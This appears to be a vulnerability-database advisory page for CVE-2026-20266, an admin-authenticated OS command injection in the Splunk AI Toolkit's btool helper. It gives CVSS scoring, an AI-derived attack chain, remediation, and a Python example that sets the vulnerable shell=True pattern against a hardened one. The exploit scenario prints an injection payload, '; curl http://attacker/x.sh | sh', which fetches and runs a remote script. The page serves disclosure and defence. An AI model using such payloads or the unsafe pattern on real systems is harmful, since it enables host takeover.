Splunk AI Toolkit CVE-2026-20266

Severity: CRITICAL (CVSS 3.1 base score 9.1)
Weakness: OS Command Injection (CWE-78)
Published: 2026-06-17 · Vendor: cisco

Severity by source

Vendor (cisco), primary rating: 9.1 CRITICAL
  CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

vuln.today AI: 9.1 CRITICAL
  Rationale: a network-reachable Splunk management plane (AV:N), no special conditions beyond the admin role (AC:L, PR:H), no user interaction (UI:N), and a shell escape from splunkd to the OS together justify S:C with full CIA impact.
  CVSS 3.1: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
  CVSS 4.0: AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Primary rating from Vendor (cisco).

CVSS Vector (Vendor: cisco)

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Attack Vector: Network
Attack Complexity: Low
Privileges Required: High
User Interaction: None
Scope: Changed
Confidentiality: High
Integrity: High
Availability: High

Lifecycle Timeline

1. Analysis Generated: Jun 17, 2026, 18:03 (vuln.today)

Description (CVE.org)

In Splunk AI Toolkit versions below 5.7.4, a user who holds the "admin" Splunk role could execute arbitrary OS commands on the host running the Splunk Enterprise instance.

The vulnerability is possible because of an unsafe shell execution pattern in the btool configuration helper, which constructs OS command strings from dynamic parameters without disabling shell interpretation.

Analysis (AI)

Authenticated command injection in Splunk AI Toolkit versions below 5.7.4 allows a user with the Splunk admin role to execute arbitrary OS commands on the underlying Splunk Enterprise host. The flaw lives in the btool configuration helper, which builds shell command strings from dynamic parameters with shell interpretation enabled. …
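The unsafe pattern the description names, shown beside its hardened form in an added illustration that is not the Splunk AI Toolkit's own code: the helper name, the install path and the parameter grammar are assumptions, and /bin/echo stands in for the splunk binary so the two behaviours can be compared offline.

```python
import re
import shlex
import subprocess

# Constructed placeholder for the Splunk install path; the advisory names no path.
SPLUNK_BIN = "/opt/splunk/bin/splunk"
# Assumption: btool conf names and stanzas are plain identifiers (e.g. "inputs",
# "default"); anything outside this set is rejected before a command is built.
SAFE_PARAM_RE = re.compile(r"^[A-Za-z0-9_.:-]+$")

def btool_command_string(conf, stanza, splunk_bin=SPLUNK_BIN):
    """Vulnerable pattern: caller-controlled values interpolated into one
    shell string. Run with shell=True, metacharacters such as ';' or '|'
    inside `stanza` are interpreted by /bin/sh (the CWE-78 condition)."""
    return f"{splunk_bin} btool {conf} list {stanza}"

def btool_argv(conf, stanza, splunk_bin=SPLUNK_BIN):
    """Hardened pattern: allow-list each parameter, then hand the program an
    argv list so that no shell ever parses the values."""
    for name, value in (("conf", conf), ("stanza", stanza)):
        if not SAFE_PARAM_RE.fullmatch(value):
            raise ValueError(f"invalid characters in {name}: {value!r}")
    return [splunk_bin, "btool", conf, "list", stanza]

def btool_command_string_quoted(conf, stanza, splunk_bin=SPLUNK_BIN):
    """If a shell string is truly unavoidable, quote every dynamic value."""
    return shlex.join([splunk_bin, "btool", conf, "list", stanza])

def run_unsafe(conf, stanza, splunk_bin=SPLUNK_BIN):
    cmd = btool_command_string(conf, stanza, splunk_bin)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

def run_hardened(conf, stanza, splunk_bin=SPLUNK_BIN):
    argv = btool_argv(conf, stanza, splunk_bin)
    return subprocess.run(argv, shell=False, capture_output=True, text=True).stdout

if __name__ == "__main__":
    # /bin/echo stands in for the splunk binary so the difference shows offline.
    tainted = "x; echo INJECTED"  # constructed sample value
    print(run_unsafe("inputs", tainted, "/bin/echo"), end="")  # second command ran
    try:
        run_hardened("inputs", tainted, "/bin/echo")
    except ValueError as exc:
        print("rejected:", exc)  # never reached the shell
```

Detection-wise, the same contrast is what to look for in a review of any Splunk app that shells out: `shell=True` (or `os.system`) fed by request parameters is the finding, an argv list with allow-listed values is the fix.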


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Access: Obtain Splunk admin credentials
Delivery: Authenticate to Splunk web/REST
Exploit: Invoke AI Toolkit btool helper with metacharacter payload
Execution: Shell interprets injected command
Persist: Execute OS commands as splunkd user
Impact: Establish host foothold beyond Splunk RBAC

Vulnerability Assessment (AI)

Exploitation: Requires an authenticated session as a user holding the Splunk admin role on a Splunk Enterprise instance that has the Splunk AI Toolkit app (versions below 5.7.4) installed and reachable; the attacker must invoke the btool configuration helper code path and supply parameter values containing shell metacharacters. … Additional conditions and limiting factors are described in the full assessment.

Risk Assessment: The CVSS 3.1 base score of 9.1 is driven mainly by AV:N, S:C, and full CIA impact, but PR:H means the attacker must already hold the Splunk admin role, a highly privileged identity that, in most realistic Splunk deployments, can already install apps, modify inputs.conf, and run scripted inputs. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.

Exploit Scenario: An attacker who has stolen or coerced Splunk admin credentials, or a malicious internal admin seeking host-level access, invokes the AI Toolkit's btool configuration helper with a parameter containing shell metacharacters such as `; curl http://attacker/x.sh | sh`. Because the helper concatenates the value into a shell command string, the injected payload executes as the splunkd OS user, giving the attacker an interactive foothold on the Splunk Enterprise host beyond Splunk's RBAC boundary. …

Remediation: Vendor-released patch: upgrade the Splunk AI Toolkit app to version 5.7.4 or later, per Splunk advisory SVD-2026-0614 (https://advisory.splunk.com/advisories/SVD-2026-0614). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended Action (AI)

Within 24 hours: identify all Splunk AI Toolkit installations and document which are running versions below 5.7.4; audit the complete membership of the Splunk admin role. …

